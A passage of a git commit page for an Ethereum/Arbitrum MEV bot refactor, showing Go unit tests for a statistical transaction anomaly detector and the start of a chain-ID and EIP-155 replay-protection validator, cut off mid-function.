feat: create v2-prep branch with comprehensive planning
Restructured project for V2 refactor: **Structure Changes:** - Moved all V1 code to orig/ folder (preserved with git mv) - Created docs/planning/ directory - Added orig/README_V1.md explaining V1 preservation **Planning Documents:** - 00_V2_MASTER_PLAN.md: Complete architecture overview - Executive summary of critical V1 issues - High-level component architecture diagrams - 5-phase implementation roadmap - Success metrics and risk mitigation - 07_TASK_BREAKDOWN.md: Atomic task breakdown - 99+ hours of detailed tasks - Every task < 2 hours (atomic) - Clear dependencies and success criteria - Organized by implementation phase **V2 Key Improvements:** - Per-exchange parsers (factory pattern) - Multi-layer strict validation - Multi-index pool cache - Background validation pipeline - Comprehensive observability **Critical Issues Addressed:** - Zero address tokens (strict validation + cache enrichment) - Parsing accuracy (protocol-specific parsers) - No audit trail (background validation channel) - Inefficient lookups (multi-index cache) - Stats disconnection (event-driven metrics) Next Steps: 1. Review planning documents 2. Begin Phase 1: Foundation (P1-001 through P1-010) 3. Implement parsers in Phase 2 4. Build cache system in Phase 3 5. Add validation pipeline in Phase 4 6. Migrate and test in Phase 5 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
1070
orig/pkg/security/anomaly_detector.go
Normal file
1070
orig/pkg/security/anomaly_detector.go
Normal file
File diff suppressed because it is too large
Load Diff
630
orig/pkg/security/anomaly_detector_test.go
Normal file
630
orig/pkg/security/anomaly_detector_test.go
Normal file
@@ -0,0 +1,630 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"math"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/stretchr/testify/assert"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
func TestNewAnomalyDetector(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
|
||||
// Test with default config
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
assert.NotNil(t, ad)
|
||||
assert.NotNil(t, ad.config)
|
||||
assert.Equal(t, 2.5, ad.config.ZScoreThreshold)
|
||||
|
||||
// Test with custom config
|
||||
customConfig := &AnomalyConfig{
|
||||
ZScoreThreshold: 3.0,
|
||||
VolumeThreshold: 4.0,
|
||||
BaselineWindow: 12 * time.Hour,
|
||||
EnableVolumeDetection: false,
|
||||
}
|
||||
|
||||
ad2 := NewAnomalyDetector(logger, customConfig)
|
||||
assert.NotNil(t, ad2)
|
||||
assert.Equal(t, 3.0, ad2.config.ZScoreThreshold)
|
||||
assert.Equal(t, 4.0, ad2.config.VolumeThreshold)
|
||||
assert.Equal(t, 12*time.Hour, ad2.config.BaselineWindow)
|
||||
assert.False(t, ad2.config.EnableVolumeDetection)
|
||||
}
|
||||
|
||||
func TestAnomalyDetectorStartStop(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Test start
|
||||
err := ad.Start()
|
||||
assert.NoError(t, err)
|
||||
assert.True(t, ad.running)
|
||||
|
||||
// Test start when already running
|
||||
err = ad.Start()
|
||||
assert.NoError(t, err)
|
||||
|
||||
// Test stop
|
||||
err = ad.Stop()
|
||||
assert.NoError(t, err)
|
||||
assert.False(t, ad.running)
|
||||
|
||||
// Test stop when already stopped
|
||||
err = ad.Stop()
|
||||
assert.NoError(t, err)
|
||||
}
|
||||
|
||||
func TestRecordMetric(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Record some normal values
|
||||
metricName := "test_metric"
|
||||
values := []float64{10.0, 12.0, 11.0, 13.0, 9.0, 14.0, 10.5, 11.5}
|
||||
|
||||
for _, value := range values {
|
||||
ad.RecordMetric(metricName, value)
|
||||
}
|
||||
|
||||
// Check pattern was created
|
||||
ad.mu.RLock()
|
||||
pattern, exists := ad.patterns[metricName]
|
||||
ad.mu.RUnlock()
|
||||
|
||||
assert.True(t, exists)
|
||||
assert.NotNil(t, pattern)
|
||||
assert.Equal(t, metricName, pattern.MetricName)
|
||||
assert.Equal(t, len(values), len(pattern.Observations))
|
||||
assert.Greater(t, pattern.Mean, 0.0)
|
||||
assert.Greater(t, pattern.StandardDev, 0.0)
|
||||
}
|
||||
|
||||
func TestRecordTransaction(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Create test transaction
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x123"),
|
||||
From: common.HexToAddress("0xabc"),
|
||||
To: &common.Address{},
|
||||
Value: 1.5,
|
||||
GasPrice: 20.0,
|
||||
GasUsed: 21000,
|
||||
Timestamp: time.Now(),
|
||||
BlockNumber: 12345,
|
||||
Success: true,
|
||||
}
|
||||
|
||||
ad.RecordTransaction(record)
|
||||
|
||||
// Check transaction was recorded
|
||||
ad.mu.RLock()
|
||||
assert.Equal(t, 1, len(ad.transactionLog))
|
||||
assert.Equal(t, record.Hash, ad.transactionLog[0].Hash)
|
||||
assert.Greater(t, ad.transactionLog[0].AnomalyScore, 0.0)
|
||||
ad.mu.RUnlock()
|
||||
}
|
||||
|
||||
func TestPatternStatistics(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Create pattern with known values
|
||||
pattern := &PatternBaseline{
|
||||
MetricName: "test",
|
||||
Observations: []float64{1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
|
||||
Percentiles: make(map[int]float64),
|
||||
SeasonalPatterns: make(map[string]float64),
|
||||
}
|
||||
|
||||
ad.updatePatternStatistics(pattern)
|
||||
|
||||
// Check statistics
|
||||
assert.Equal(t, 5.5, pattern.Mean)
|
||||
assert.Equal(t, 1.0, pattern.Min)
|
||||
assert.Equal(t, 10.0, pattern.Max)
|
||||
assert.Greater(t, pattern.StandardDev, 0.0)
|
||||
assert.Greater(t, pattern.Variance, 0.0)
|
||||
|
||||
// Check percentiles
|
||||
assert.NotEmpty(t, pattern.Percentiles)
|
||||
assert.Contains(t, pattern.Percentiles, 50)
|
||||
assert.Contains(t, pattern.Percentiles, 95)
|
||||
}
|
||||
|
||||
func TestZScoreCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
pattern := &PatternBaseline{
|
||||
Mean: 10.0,
|
||||
StandardDev: 2.0,
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
value float64
|
||||
expected float64
|
||||
}{
|
||||
{10.0, 0.0}, // At mean
|
||||
{12.0, 1.0}, // 1 std dev above
|
||||
{8.0, -1.0}, // 1 std dev below
|
||||
{16.0, 3.0}, // 3 std devs above
|
||||
{4.0, -3.0}, // 3 std devs below
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
zScore := ad.calculateZScore(tc.value, pattern)
|
||||
assert.Equal(t, tc.expected, zScore, "Z-score for value %.1f", tc.value)
|
||||
}
|
||||
|
||||
// Test with zero standard deviation
|
||||
pattern.StandardDev = 0
|
||||
zScore := ad.calculateZScore(15.0, pattern)
|
||||
assert.Equal(t, 0.0, zScore)
|
||||
}
|
||||
|
||||
func TestAnomalyDetection(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
config := &AnomalyConfig{
|
||||
ZScoreThreshold: 2.0,
|
||||
VolumeThreshold: 2.0,
|
||||
EnableVolumeDetection: true,
|
||||
EnableBehavioralAD: true,
|
||||
EnablePatternDetection: true,
|
||||
}
|
||||
ad := NewAnomalyDetector(logger, config)
|
||||
|
||||
// Build baseline with normal values
|
||||
normalValues := []float64{100, 105, 95, 110, 90, 115, 85, 120, 80, 125}
|
||||
for _, value := range normalValues {
|
||||
ad.RecordMetric("transaction_value", value)
|
||||
}
|
||||
|
||||
// Record anomalous value
|
||||
anomalousValue := 500.0 // Way above normal
|
||||
ad.RecordMetric("transaction_value", anomalousValue)
|
||||
|
||||
// Check if alert was generated
|
||||
select {
|
||||
case alert := <-ad.GetAlerts():
|
||||
assert.NotNil(t, alert)
|
||||
assert.Equal(t, AnomalyTypeStatistical, alert.Type)
|
||||
assert.Equal(t, "transaction_value", alert.MetricName)
|
||||
assert.Equal(t, anomalousValue, alert.ObservedValue)
|
||||
assert.Greater(t, alert.Score, 2.0)
|
||||
case <-time.After(100 * time.Millisecond):
|
||||
t.Error("Expected anomaly alert but none received")
|
||||
}
|
||||
}
|
||||
|
||||
func TestVolumeAnomalyDetection(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
config := &AnomalyConfig{
|
||||
VolumeThreshold: 2.0,
|
||||
EnableVolumeDetection: true,
|
||||
}
|
||||
ad := NewAnomalyDetector(logger, config)
|
||||
|
||||
// Build baseline
|
||||
for i := 0; i < 20; i++ {
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x" + string(rune(i))),
|
||||
From: common.HexToAddress("0x123"),
|
||||
Value: 1.0, // Normal value
|
||||
GasPrice: 20.0,
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(record)
|
||||
}
|
||||
|
||||
// Record anomalous transaction
|
||||
anomalousRecord := &TransactionRecord{
|
||||
Hash: common.HexToHash("0xanomaly"),
|
||||
From: common.HexToAddress("0x456"),
|
||||
Value: 50.0, // Much higher than normal
|
||||
GasPrice: 20.0,
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(anomalousRecord)
|
||||
|
||||
// Check for alert
|
||||
select {
|
||||
case alert := <-ad.GetAlerts():
|
||||
assert.NotNil(t, alert)
|
||||
assert.Equal(t, AnomalyTypeVolume, alert.Type)
|
||||
assert.Equal(t, 50.0, alert.ObservedValue)
|
||||
case <-time.After(100 * time.Millisecond):
|
||||
// Volume detection might not trigger with insufficient baseline
|
||||
// This is acceptable behavior
|
||||
}
|
||||
}
|
||||
|
||||
func TestBehavioralAnomalyDetection(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
config := &AnomalyConfig{
|
||||
EnableBehavioralAD: true,
|
||||
}
|
||||
ad := NewAnomalyDetector(logger, config)
|
||||
|
||||
sender := common.HexToAddress("0x123")
|
||||
|
||||
// Record normal transactions from sender
|
||||
for i := 0; i < 10; i++ {
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x" + string(rune(i))),
|
||||
From: sender,
|
||||
Value: 1.0,
|
||||
GasPrice: 20.0, // Normal gas price
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(record)
|
||||
}
|
||||
|
||||
// Record anomalous gas price transaction
|
||||
anomalousRecord := &TransactionRecord{
|
||||
Hash: common.HexToHash("0xanomaly"),
|
||||
From: sender,
|
||||
Value: 1.0,
|
||||
GasPrice: 200.0, // 10x higher gas price
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(anomalousRecord)
|
||||
|
||||
// Check for alert
|
||||
select {
|
||||
case alert := <-ad.GetAlerts():
|
||||
assert.NotNil(t, alert)
|
||||
assert.Equal(t, AnomalyTypeBehavioral, alert.Type)
|
||||
assert.Equal(t, sender.Hex(), alert.Source)
|
||||
case <-time.After(100 * time.Millisecond):
|
||||
// Behavioral detection might not trigger immediately
|
||||
// This is acceptable behavior
|
||||
}
|
||||
}
|
||||
|
||||
func TestSeverityCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
testCases := []struct {
|
||||
zScore float64
|
||||
expected AnomalySeverity
|
||||
}{
|
||||
{1.5, AnomalySeverityLow},
|
||||
{2.5, AnomalySeverityMedium},
|
||||
{3.5, AnomalySeverityHigh},
|
||||
{4.5, AnomalySeverityCritical},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
severity := ad.calculateSeverity(tc.zScore)
|
||||
assert.Equal(t, tc.expected, severity, "Severity for Z-score %.1f", tc.zScore)
|
||||
}
|
||||
}
|
||||
|
||||
func TestConfidenceCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Test with different Z-scores and sample sizes
|
||||
testCases := []struct {
|
||||
zScore float64
|
||||
sampleSize int
|
||||
minConf float64
|
||||
maxConf float64
|
||||
}{
|
||||
{2.0, 10, 0.0, 1.0},
|
||||
{5.0, 100, 0.5, 1.0},
|
||||
{1.0, 200, 0.0, 1.0},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
confidence := ad.calculateConfidence(tc.zScore, tc.sampleSize)
|
||||
assert.GreaterOrEqual(t, confidence, tc.minConf)
|
||||
assert.LessOrEqual(t, confidence, tc.maxConf)
|
||||
}
|
||||
}
|
||||
|
||||
func TestTrendCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Test increasing trend
|
||||
increasing := []float64{1, 2, 3, 4, 5}
|
||||
trend := ad.calculateTrend(increasing)
|
||||
assert.Greater(t, trend, 0.0)
|
||||
|
||||
// Test decreasing trend
|
||||
decreasing := []float64{5, 4, 3, 2, 1}
|
||||
trend = ad.calculateTrend(decreasing)
|
||||
assert.Less(t, trend, 0.0)
|
||||
|
||||
// Test stable trend
|
||||
stable := []float64{5, 5, 5, 5, 5}
|
||||
trend = ad.calculateTrend(stable)
|
||||
assert.Equal(t, 0.0, trend)
|
||||
|
||||
// Test edge cases
|
||||
empty := []float64{}
|
||||
trend = ad.calculateTrend(empty)
|
||||
assert.Equal(t, 0.0, trend)
|
||||
|
||||
single := []float64{5}
|
||||
trend = ad.calculateTrend(single)
|
||||
assert.Equal(t, 0.0, trend)
|
||||
}
|
||||
|
||||
func TestAnomalyReport(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Add some data
|
||||
ad.RecordMetric("test_metric1", 10.0)
|
||||
ad.RecordMetric("test_metric2", 20.0)
|
||||
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x123"),
|
||||
From: common.HexToAddress("0xabc"),
|
||||
Value: 1.0,
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(record)
|
||||
|
||||
// Generate report
|
||||
report := ad.GetAnomalyReport()
|
||||
assert.NotNil(t, report)
|
||||
assert.Greater(t, report.PatternsTracked, 0)
|
||||
assert.Greater(t, report.TransactionsAnalyzed, 0)
|
||||
assert.NotNil(t, report.PatternSummaries)
|
||||
assert.NotNil(t, report.SystemHealth)
|
||||
assert.NotZero(t, report.Timestamp)
|
||||
}
|
||||
|
||||
func TestPatternSummaries(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Create patterns with different trends
|
||||
ad.RecordMetric("increasing", 1.0)
|
||||
ad.RecordMetric("increasing", 2.0)
|
||||
ad.RecordMetric("increasing", 3.0)
|
||||
ad.RecordMetric("increasing", 4.0)
|
||||
ad.RecordMetric("increasing", 5.0)
|
||||
|
||||
ad.RecordMetric("stable", 10.0)
|
||||
ad.RecordMetric("stable", 10.0)
|
||||
ad.RecordMetric("stable", 10.0)
|
||||
|
||||
summaries := ad.getPatternSummaries()
|
||||
assert.NotEmpty(t, summaries)
|
||||
|
||||
for name, summary := range summaries {
|
||||
assert.NotEmpty(t, summary.MetricName)
|
||||
assert.Equal(t, name, summary.MetricName)
|
||||
assert.GreaterOrEqual(t, summary.SampleCount, int64(0))
|
||||
assert.Contains(t, []string{"INCREASING", "DECREASING", "STABLE"}, summary.Trend)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSystemHealth(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
health := ad.calculateSystemHealth()
|
||||
assert.NotNil(t, health)
|
||||
assert.GreaterOrEqual(t, health.AlertChannelSize, 0)
|
||||
assert.GreaterOrEqual(t, health.ProcessingLatency, 0.0)
|
||||
assert.GreaterOrEqual(t, health.MemoryUsage, int64(0))
|
||||
assert.GreaterOrEqual(t, health.ErrorRate, 0.0)
|
||||
assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
|
||||
}
|
||||
|
||||
func TestTransactionHistoryLimit(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
config := &AnomalyConfig{
|
||||
MaxTransactionHistory: 5, // Small limit for testing
|
||||
}
|
||||
ad := NewAnomalyDetector(logger, config)
|
||||
|
||||
// Add more transactions than the limit
|
||||
for i := 0; i < 10; i++ {
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x" + string(rune(i))),
|
||||
From: common.HexToAddress("0x123"),
|
||||
Value: float64(i),
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
ad.RecordTransaction(record)
|
||||
}
|
||||
|
||||
// Check that history is limited
|
||||
ad.mu.RLock()
|
||||
assert.LessOrEqual(t, len(ad.transactionLog), config.MaxTransactionHistory)
|
||||
ad.mu.RUnlock()
|
||||
}
|
||||
|
||||
func TestPatternHistoryLimit(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
config := &AnomalyConfig{
|
||||
MaxPatternHistory: 3, // Small limit for testing
|
||||
}
|
||||
ad := NewAnomalyDetector(logger, config)
|
||||
|
||||
metricName := "test_metric"
|
||||
|
||||
// Add more observations than the limit
|
||||
for i := 0; i < 10; i++ {
|
||||
ad.RecordMetric(metricName, float64(i))
|
||||
}
|
||||
|
||||
// Check that pattern history is limited
|
||||
ad.mu.RLock()
|
||||
pattern := ad.patterns[metricName]
|
||||
assert.LessOrEqual(t, len(pattern.Observations), config.MaxPatternHistory)
|
||||
ad.mu.RUnlock()
|
||||
}
|
||||
|
||||
func TestTimeAnomalyScore(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Test business hours (should be normal)
|
||||
businessTime := time.Date(2023, 1, 1, 14, 0, 0, 0, time.UTC) // 2 PM
|
||||
score := ad.calculateTimeAnomalyScore(businessTime)
|
||||
assert.Equal(t, 0.0, score)
|
||||
|
||||
// Test late night (should be suspicious)
|
||||
nightTime := time.Date(2023, 1, 1, 2, 0, 0, 0, time.UTC) // 2 AM
|
||||
score = ad.calculateTimeAnomalyScore(nightTime)
|
||||
assert.Greater(t, score, 0.5)
|
||||
|
||||
// Test evening (should be medium suspicion)
|
||||
eveningTime := time.Date(2023, 1, 1, 20, 0, 0, 0, time.UTC) // 8 PM
|
||||
score = ad.calculateTimeAnomalyScore(eveningTime)
|
||||
assert.Greater(t, score, 0.0)
|
||||
assert.Less(t, score, 0.5)
|
||||
}
|
||||
|
||||
func TestSenderFrequencyCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
sender := common.HexToAddress("0x123")
|
||||
now := time.Now()
|
||||
|
||||
// Add recent transactions
|
||||
for i := 0; i < 5; i++ {
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x" + string(rune(i))),
|
||||
From: sender,
|
||||
Value: 1.0,
|
||||
Timestamp: now.Add(-time.Duration(i) * time.Minute),
|
||||
}
|
||||
ad.RecordTransaction(record)
|
||||
}
|
||||
|
||||
// Add old transaction (should not count)
|
||||
oldRecord := &TransactionRecord{
|
||||
Hash: common.HexToHash("0xold"),
|
||||
From: sender,
|
||||
Value: 1.0,
|
||||
Timestamp: now.Add(-2 * time.Hour),
|
||||
}
|
||||
ad.RecordTransaction(oldRecord)
|
||||
|
||||
frequency := ad.calculateSenderFrequency(sender)
|
||||
assert.Equal(t, 5.0, frequency) // Should only count recent transactions
|
||||
}
|
||||
|
||||
func TestAverageGasPriceCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
transactions := []*TransactionRecord{
|
||||
{GasPrice: 10.0},
|
||||
{GasPrice: 20.0},
|
||||
{GasPrice: 30.0},
|
||||
}
|
||||
|
||||
avgGasPrice := ad.calculateAverageGasPrice(transactions)
|
||||
assert.Equal(t, 20.0, avgGasPrice)
|
||||
|
||||
// Test empty slice
|
||||
emptyAvg := ad.calculateAverageGasPrice([]*TransactionRecord{})
|
||||
assert.Equal(t, 0.0, emptyAvg)
|
||||
}
|
||||
|
||||
func TestMeanAndStdDevCalculation(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
values := []float64{1, 2, 3, 4, 5}
|
||||
mean := ad.calculateMean(values)
|
||||
assert.Equal(t, 3.0, mean)
|
||||
|
||||
stdDev := ad.calculateStdDev(values, mean)
|
||||
expectedStdDev := math.Sqrt(2.0) // For this specific sequence
|
||||
assert.InDelta(t, expectedStdDev, stdDev, 0.001)
|
||||
|
||||
// Test empty slice
|
||||
emptyMean := ad.calculateMean([]float64{})
|
||||
assert.Equal(t, 0.0, emptyMean)
|
||||
|
||||
emptyStdDev := ad.calculateStdDev([]float64{}, 0.0)
|
||||
assert.Equal(t, 0.0, emptyStdDev)
|
||||
}
|
||||
|
||||
func TestAlertGeneration(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
// Test alert ID generation
|
||||
id1 := ad.generateAlertID()
|
||||
id2 := ad.generateAlertID()
|
||||
assert.NotEqual(t, id1, id2)
|
||||
assert.Contains(t, id1, "anomaly_")
|
||||
|
||||
// Test description generation
|
||||
pattern := &PatternBaseline{
|
||||
Mean: 10.0,
|
||||
}
|
||||
desc := ad.generateAnomalyDescription("test_metric", 15.0, pattern, 2.5)
|
||||
assert.Contains(t, desc, "test_metric")
|
||||
assert.Contains(t, desc, "15.00")
|
||||
assert.Contains(t, desc, "10.00")
|
||||
assert.Contains(t, desc, "2.5")
|
||||
|
||||
// Test recommendations generation
|
||||
recommendations := ad.generateRecommendations("transaction_value", 3.5)
|
||||
assert.NotEmpty(t, recommendations)
|
||||
assert.Contains(t, recommendations[0], "investigation")
|
||||
}
|
||||
|
||||
func BenchmarkRecordTransaction(b *testing.B) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
record := &TransactionRecord{
|
||||
Hash: common.HexToHash("0x123"),
|
||||
From: common.HexToAddress("0xabc"),
|
||||
Value: 1.0,
|
||||
GasPrice: 20.0,
|
||||
Timestamp: time.Now(),
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
ad.RecordTransaction(record)
|
||||
}
|
||||
}
|
||||
|
||||
func BenchmarkRecordMetric(b *testing.B) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
ad.RecordMetric("test_metric", float64(i))
|
||||
}
|
||||
}
|
||||
|
||||
func BenchmarkCalculateZScore(b *testing.B) {
|
||||
logger := logger.New("info", "text", "")
|
||||
ad := NewAnomalyDetector(logger, nil)
|
||||
|
||||
pattern := &PatternBaseline{
|
||||
Mean: 10.0,
|
||||
StandardDev: 2.0,
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
ad.calculateZScore(float64(i), pattern)
|
||||
}
|
||||
}
|
||||
1646
orig/pkg/security/audit_analyzer.go
Normal file
1646
orig/pkg/security/audit_analyzer.go
Normal file
File diff suppressed because it is too large
Load Diff
499
orig/pkg/security/chain_validation.go
Normal file
499
orig/pkg/security/chain_validation.go
Normal file
@@ -0,0 +1,499 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"math/big"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// ChainIDValidator provides comprehensive chain ID validation and EIP-155 replay protection
|
||||
type ChainIDValidator struct {
|
||||
logger *logger.Logger
|
||||
expectedChainID *big.Int
|
||||
allowedChainIDs map[uint64]bool
|
||||
replayAttackDetector *ReplayAttackDetector
|
||||
mu sync.RWMutex
|
||||
|
||||
// Chain ID validation statistics
|
||||
validationCount uint64
|
||||
mismatchCount uint64
|
||||
replayAttemptCount uint64
|
||||
lastMismatchTime time.Time
|
||||
}
|
||||
|
||||
func (cv *ChainIDValidator) normalizeChainID(txChainID *big.Int, override *big.Int) *big.Int {
|
||||
if override != nil {
|
||||
// Use override when transaction chain ID is missing or placeholder
|
||||
if isPlaceholderChainID(txChainID) {
|
||||
return new(big.Int).Set(override)
|
||||
}
|
||||
}
|
||||
|
||||
if isPlaceholderChainID(txChainID) {
|
||||
return new(big.Int).Set(cv.expectedChainID)
|
||||
}
|
||||
|
||||
return new(big.Int).Set(txChainID)
|
||||
}
|
||||
|
||||
func isPlaceholderChainID(id *big.Int) bool {
|
||||
if id == nil || id.Sign() == 0 {
|
||||
return true
|
||||
}
|
||||
|
||||
// Treat extremely large values (legacy placeholder) as missing
|
||||
if id.BitLen() >= 62 {
|
||||
return true
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// ReplayAttackDetector tracks potential replay attacks
|
||||
type ReplayAttackDetector struct {
|
||||
// Track transaction hashes across different chain IDs to detect replay attempts
|
||||
seenTransactions map[string]ChainIDRecord
|
||||
maxTrackingTime time.Duration
|
||||
mu sync.Mutex
|
||||
}
|
||||
|
||||
// ChainIDRecord stores information about a transaction's chain ID usage
|
||||
type ChainIDRecord struct {
|
||||
ChainID uint64
|
||||
FirstSeen time.Time
|
||||
Count int
|
||||
From common.Address
|
||||
AlertTriggered bool
|
||||
}
|
||||
|
||||
// ChainValidationResult contains comprehensive chain ID validation results
|
||||
type ChainValidationResult struct {
|
||||
Valid bool `json:"valid"`
|
||||
ExpectedChainID uint64 `json:"expected_chain_id"`
|
||||
ActualChainID uint64 `json:"actual_chain_id"`
|
||||
IsEIP155Protected bool `json:"is_eip155_protected"`
|
||||
ReplayRisk string `json:"replay_risk"` // NONE, LOW, MEDIUM, HIGH, CRITICAL
|
||||
Warnings []string `json:"warnings"`
|
||||
Errors []string `json:"errors"`
|
||||
SecurityMetadata map[string]interface{} `json:"security_metadata"`
|
||||
}
|
||||
|
||||
// NewChainIDValidator creates a new chain ID validator
|
||||
func NewChainIDValidator(logger *logger.Logger, expectedChainID *big.Int) *ChainIDValidator {
|
||||
return &ChainIDValidator{
|
||||
logger: logger,
|
||||
expectedChainID: expectedChainID,
|
||||
allowedChainIDs: map[uint64]bool{
|
||||
1: true, // Ethereum mainnet (for testing)
|
||||
42161: true, // Arbitrum One mainnet
|
||||
421614: true, // Arbitrum Sepolia testnet (for testing)
|
||||
},
|
||||
replayAttackDetector: &ReplayAttackDetector{
|
||||
seenTransactions: make(map[string]ChainIDRecord),
|
||||
maxTrackingTime: 24 * time.Hour, // Track for 24 hours
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// ValidateChainID performs comprehensive chain ID validation
|
||||
func (cv *ChainIDValidator) ValidateChainID(tx *types.Transaction, signerAddr common.Address, overrideChainID *big.Int) *ChainValidationResult {
|
||||
actualChainID := cv.normalizeChainID(tx.ChainId(), overrideChainID)
|
||||
|
||||
result := &ChainValidationResult{
|
||||
Valid: true,
|
||||
ExpectedChainID: cv.expectedChainID.Uint64(),
|
||||
ActualChainID: actualChainID.Uint64(),
|
||||
SecurityMetadata: make(map[string]interface{}),
|
||||
}
|
||||
|
||||
cv.mu.Lock()
|
||||
defer cv.mu.Unlock()
|
||||
|
||||
cv.validationCount++
|
||||
|
||||
// 1. Basic Chain ID Validation
|
||||
if actualChainID.Uint64() != cv.expectedChainID.Uint64() {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors,
|
||||
fmt.Sprintf("Chain ID mismatch: expected %d, got %d",
|
||||
cv.expectedChainID.Uint64(), actualChainID.Uint64()))
|
||||
|
||||
cv.mismatchCount++
|
||||
cv.lastMismatchTime = time.Now()
|
||||
|
||||
// Log security alert
|
||||
cv.logger.Warn(fmt.Sprintf("SECURITY ALERT: Chain ID mismatch detected from %s - Expected: %d, Got: %d",
|
||||
signerAddr.Hex(), cv.expectedChainID.Uint64(), actualChainID.Uint64()))
|
||||
}
|
||||
|
||||
// 2. EIP-155 Replay Protection Verification
|
||||
eip155Result := cv.validateEIP155Protection(tx, actualChainID)
|
||||
result.IsEIP155Protected = eip155Result.protected
|
||||
if !eip155Result.protected {
|
||||
result.Warnings = append(result.Warnings, "Transaction lacks EIP-155 replay protection")
|
||||
result.ReplayRisk = "HIGH"
|
||||
} else {
|
||||
result.ReplayRisk = "NONE"
|
||||
}
|
||||
|
||||
// 3. Chain ID Allowlist Validation
|
||||
if !cv.allowedChainIDs[actualChainID.Uint64()] {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors,
|
||||
fmt.Sprintf("Chain ID %d is not in the allowed list", actualChainID.Uint64()))
|
||||
|
||||
cv.logger.Error(fmt.Sprintf("SECURITY ALERT: Attempted transaction on unauthorized chain %d from %s",
|
||||
actualChainID.Uint64(), signerAddr.Hex()))
|
||||
}
|
||||
|
||||
// 4. Replay Attack Detection
|
||||
replayResult := cv.detectReplayAttack(tx, signerAddr, actualChainID.Uint64())
|
||||
